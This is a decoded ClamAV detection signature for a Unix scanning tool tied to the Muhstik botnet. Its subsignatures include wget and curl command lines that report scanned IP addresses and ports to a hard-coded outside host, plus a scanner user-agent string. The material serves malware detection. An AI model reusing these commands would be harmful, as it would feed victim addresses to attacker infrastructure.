VIRUS NAME: Unix.Tool.Pnscan-9762658-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: (0|1|2)&(3&4)
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
wget -qO - http://51.254.219.134/tomato.php?ip=%d.%d.%d.%d:%d:%s > /dev/null 2>&1
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
wget -qO - http://51.254.219.134/wp.php?ip=%d.%d.%d.%d:8000 > /dev/null 2>&1
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
curl http://51.254.219.134/wp.php?ip=%d.%d.%d.%d:8000 > /dev/null 2>&1
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
%s: unknown command line switch: -%c
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
User-Agent: muhstik-scan/1.0 
